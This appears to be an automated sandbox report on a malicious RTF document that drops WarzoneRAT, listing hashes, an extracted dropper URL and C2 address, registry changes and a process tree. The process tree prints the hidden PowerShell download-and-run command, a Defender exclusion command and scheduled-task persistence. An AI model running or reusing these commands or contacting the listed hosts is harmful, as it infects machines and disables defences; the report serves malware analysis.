warzonerat | 959837140aee207e9fd845a030881f9430364d2df8088845f5828579420b1717

Analysis

max time kernel
75s
max time network
151s
platform
windows7_x64
resource
win7-20220812-en
resource tags

arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
submitted
23-09-2022 06:12

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Item Selection - Inquiry 0054363AZH - AltayGlobal Trading.rtf
Size

216KB
MD5

9bc102ffb0930f5dee65bde8e0ba6d89
SHA1

37cac7507a6ad02a75d947a9bdfe115f2da8b71b
SHA256

959837140aee207e9fd845a030881f9430364d2df8088845f5828579420b1717
SHA512

acdb50e95c30e14b235a89ed4a86531a64c1c3246b3d65a116a80e64a6f9d061c7a2dc784b9942cf1beb5d7fbdd6302139347a490886386d54c0dc372404e0fd
SSDEEP

1536:9mDDRxjrfUG7NP0UlAD8KEmt09N/FUr1nvX+EEFZVzFz76mAg5eeVhMDw5wfLz:94F1lVzFtr5RDAw5wfP

Score

10^/10

warzonerat infostealer rat

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://login.929389.ankura.us/AwOgYiWG/explorer.exe

Extracted

Family

warzonerat

20.126.95.155:7800

Signatures

Process spawned unexpected child process 6 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

powershell.execmd.exepowershell.execmd.exepowershell.execmd.exe

description	pid	pid_target	process	target process
Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process	1020	1960	powershell.exe	WINWORD.EXE
Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process	1948	1960	cmd.exe	WINWORD.EXE
Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process	268	1960	powershell.exe	WINWORD.EXE
Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process	1860	1960	cmd.exe	WINWORD.EXE
Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process	1436	1960	powershell.exe	WINWORD.EXE
Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process	380	1960	cmd.exe	WINWORD.EXE

WarzoneRat, AveMaria
WarzoneRat is a native RAT developed in C++ with multiple plugins sold as a MaaS.
rat infostealer warzonerat

Warzone RAT payload 9 IoCs

rat

Processes:

resource	yara_rule
behavioral1/memory/2040-114-0x0000000000400000-0x0000000000554000-memory.dmp	warzonerat
behavioral1/memory/2040-115-0x0000000000400000-0x0000000000554000-memory.dmp	warzonerat
behavioral1/memory/2040-118-0x0000000000400000-0x0000000000554000-memory.dmp	warzonerat
behavioral1/memory/2040-120-0x0000000000400000-0x0000000000554000-memory.dmp	warzonerat
behavioral1/memory/2040-117-0x0000000000400000-0x0000000000554000-memory.dmp	warzonerat
behavioral1/memory/2040-121-0x0000000000405CE2-mapping.dmp	warzonerat
behavioral1/memory/2040-126-0x0000000000400000-0x0000000000554000-memory.dmp	warzonerat
behavioral1/memory/1404-142-0x0000000000405CE2-mapping.dmp	warzonerat
behavioral1/memory/2040-150-0x0000000000400000-0x0000000000554000-memory.dmp	warzonerat

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

5 1020 powershell.exe
Downloads MZ/PE file
Executes dropped EXE 3 IoCs

Processes:

explorer.exeexplorer.exeexplorer.exe

pid process

1620 explorer.exe
996 explorer.exe
916 explorer.exe
Loads dropped DLL 4 IoCs

Processes:

cmd.execmd.execmd.exe

pid process

1948 cmd.exe
1948 cmd.exe
1860 cmd.exe
380 cmd.exe

flow	pid	process
5	1020	powershell.exe

pid	process
1620	explorer.exe
996	explorer.exe
916	explorer.exe

pid	process
1948	cmd.exe
1948	cmd.exe
1860	cmd.exe
380	cmd.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

explorer.exeexplorer.exe

description	pid	process	target process
PID 1620 set thread context of 2040	1620	explorer.exe	MSBuild.exe
PID 996 set thread context of 1404	996	explorer.exe	MSBuild.exe

Drops file in Windows directory 1 IoCs

Processes:

WINWORD.EXE

description ioc process

File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Office loads VBA resources, possible macro or embedded object present
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exe

pid process

428 schtasks.exe
820 schtasks.exe
1016 schtasks.exe

description	ioc	process
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	WINWORD.EXE

pid	process
428	schtasks.exe
820	schtasks.exe
1016	schtasks.exe

Modifies Internet Explorer settings 1 TTPs 31 IoCs

adware spyware

Modify Registry

T1112

Processes:

WINWORD.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes"	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Toolbar	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\MenuExt	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"	WINWORD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command	WINWORD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55"	WINWORD.EXE

Modifies registry class 64 IoCs

Processes:

WINWORD.EXE

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\ = "&Open"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\DefaultIcon	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\ = "&Open"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\ = "[open(\"%1\")]"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\ShellEx	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\ = "&Edit"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\ = "&Open"	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ = "&Open"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\htmlfile	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohevi.dll"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\topic	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\ = "&Open"	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\topic\ = "system"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application\ = "Excel"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\ = "[open(\"%1\")]"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\application\ = "Excel"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version\14\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32\ThreadingModel = "Apartment"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application\ = "Excel"	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\ = "[open(\"%1\")]"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\application	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

WINWORD.EXE

pid process

1960 WINWORD.EXE
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

pid process

1020 powershell.exe
268 powershell.exe
1436 powershell.exe
1700 powershell.exe

pid	process
1960	WINWORD.EXE

pid	process
1020	powershell.exe
268	powershell.exe
1436	powershell.exe
1700	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	1020	powershell.exe
Token: SeDebugPrivilege	268	powershell.exe
Token: SeDebugPrivilege	1436	powershell.exe
Token: SeDebugPrivilege	1700	powershell.exe

Suspicious use of SetWindowsHookEx 4 IoCs

Processes:

WINWORD.EXE

pid process

1960 WINWORD.EXE
1960 WINWORD.EXE
1960 WINWORD.EXE
1960 WINWORD.EXE

pid	process
1960	WINWORD.EXE
1960	WINWORD.EXE
1960	WINWORD.EXE
1960	WINWORD.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

WINWORD.EXEcmd.execmd.execmd.exeexplorer.exeexplorer.exe

description	pid	process	target process
PID 1960 wrote to memory of 1020	1960	WINWORD.EXE	powershell.exe
PID 1960 wrote to memory of 1020	1960	WINWORD.EXE	powershell.exe
PID 1960 wrote to memory of 1020	1960	WINWORD.EXE	powershell.exe
PID 1960 wrote to memory of 1020	1960	WINWORD.EXE	powershell.exe
PID 1960 wrote to memory of 1948	1960	WINWORD.EXE	cmd.exe
PID 1960 wrote to memory of 1948	1960	WINWORD.EXE	cmd.exe
PID 1960 wrote to memory of 1948	1960	WINWORD.EXE	cmd.exe
PID 1960 wrote to memory of 1948	1960	WINWORD.EXE	cmd.exe
PID 1948 wrote to memory of 1620	1948	cmd.exe	explorer.exe
PID 1948 wrote to memory of 1620	1948	cmd.exe	explorer.exe
PID 1948 wrote to memory of 1620	1948	cmd.exe	explorer.exe
PID 1948 wrote to memory of 1620	1948	cmd.exe	explorer.exe
PID 1960 wrote to memory of 268	1960	WINWORD.EXE	powershell.exe
PID 1960 wrote to memory of 268	1960	WINWORD.EXE	powershell.exe
PID 1960 wrote to memory of 268	1960	WINWORD.EXE	powershell.exe
PID 1960 wrote to memory of 268	1960	WINWORD.EXE	powershell.exe
PID 1960 wrote to memory of 1860	1960	WINWORD.EXE	cmd.exe
PID 1960 wrote to memory of 1860	1960	WINWORD.EXE	cmd.exe
PID 1960 wrote to memory of 1860	1960	WINWORD.EXE	cmd.exe
PID 1960 wrote to memory of 1860	1960	WINWORD.EXE	cmd.exe
PID 1860 wrote to memory of 996	1860	cmd.exe	explorer.exe
PID 1860 wrote to memory of 996	1860	cmd.exe	explorer.exe
PID 1860 wrote to memory of 996	1860	cmd.exe	explorer.exe
PID 1860 wrote to memory of 996	1860	cmd.exe	explorer.exe
PID 1960 wrote to memory of 1436	1960	WINWORD.EXE	powershell.exe
PID 1960 wrote to memory of 1436	1960	WINWORD.EXE	powershell.exe
PID 1960 wrote to memory of 1436	1960	WINWORD.EXE	powershell.exe
PID 1960 wrote to memory of 1436	1960	WINWORD.EXE	powershell.exe
PID 1960 wrote to memory of 380	1960	WINWORD.EXE	cmd.exe
PID 1960 wrote to memory of 380	1960	WINWORD.EXE	cmd.exe
PID 1960 wrote to memory of 380	1960	WINWORD.EXE	cmd.exe
PID 1960 wrote to memory of 380	1960	WINWORD.EXE	cmd.exe
PID 380 wrote to memory of 916	380	cmd.exe	explorer.exe
PID 380 wrote to memory of 916	380	cmd.exe	explorer.exe
PID 380 wrote to memory of 916	380	cmd.exe	explorer.exe
PID 380 wrote to memory of 916	380	cmd.exe	explorer.exe
PID 1960 wrote to memory of 1928	1960	WINWORD.EXE	splwow64.exe
PID 1960 wrote to memory of 1928	1960	WINWORD.EXE	splwow64.exe
PID 1960 wrote to memory of 1928	1960	WINWORD.EXE	splwow64.exe
PID 1960 wrote to memory of 1928	1960	WINWORD.EXE	splwow64.exe
PID 1620 wrote to memory of 1700	1620	explorer.exe	powershell.exe
PID 1620 wrote to memory of 1700	1620	explorer.exe	powershell.exe
PID 1620 wrote to memory of 1700	1620	explorer.exe	powershell.exe
PID 1620 wrote to memory of 1700	1620	explorer.exe	powershell.exe
PID 1620 wrote to memory of 1016	1620	explorer.exe	schtasks.exe
PID 1620 wrote to memory of 1016	1620	explorer.exe	schtasks.exe
PID 1620 wrote to memory of 1016	1620	explorer.exe	schtasks.exe
PID 1620 wrote to memory of 1016	1620	explorer.exe	schtasks.exe
PID 1620 wrote to memory of 2040	1620	explorer.exe	MSBuild.exe
PID 1620 wrote to memory of 2040	1620	explorer.exe	MSBuild.exe
PID 1620 wrote to memory of 2040	1620	explorer.exe	MSBuild.exe
PID 1620 wrote to memory of 2040	1620	explorer.exe	MSBuild.exe
PID 1620 wrote to memory of 2040	1620	explorer.exe	MSBuild.exe
PID 1620 wrote to memory of 2040	1620	explorer.exe	MSBuild.exe
PID 1620 wrote to memory of 2040	1620	explorer.exe	MSBuild.exe
PID 1620 wrote to memory of 2040	1620	explorer.exe	MSBuild.exe
PID 1620 wrote to memory of 2040	1620	explorer.exe	MSBuild.exe
PID 1620 wrote to memory of 2040	1620	explorer.exe	MSBuild.exe
PID 996 wrote to memory of 2008	996	explorer.exe	powershell.exe
PID 996 wrote to memory of 2008	996	explorer.exe	powershell.exe
PID 996 wrote to memory of 2008	996	explorer.exe	powershell.exe
PID 996 wrote to memory of 2008	996	explorer.exe	powershell.exe
PID 1620 wrote to memory of 2040	1620	explorer.exe	MSBuild.exe
PID 1620 wrote to memory of 2040	1620	explorer.exe	MSBuild.exe

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Item Selection - Inquiry 0054363AZH - AltayGlobal Trading.rtf"
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1960

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://login.929389.ankura.us/AwOgYiWG/explorer.exe','C:\Users\Admin\AppData\Roaming\explorer.exe')
2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1020

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Roaming\explorer.exe
2⤵
- Process spawned unexpected child process
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1948

C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1620

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\eDdYRRbouy.exe"
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1700

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eDdYRRbouy" /XML "C:\Users\Admin\AppData\Local\Temp\tmp7253.tmp"
4⤵
- Creates scheduled task(s)
PID:1016

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
4⤵
PID:2040

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://login.929389.ankura.us/AwOgYiWG/explorer.exe','C:\Users\Admin\AppData\Roaming\explorer.exe')
2⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:268

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Roaming\explorer.exe
2⤵
- Process spawned unexpected child process
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
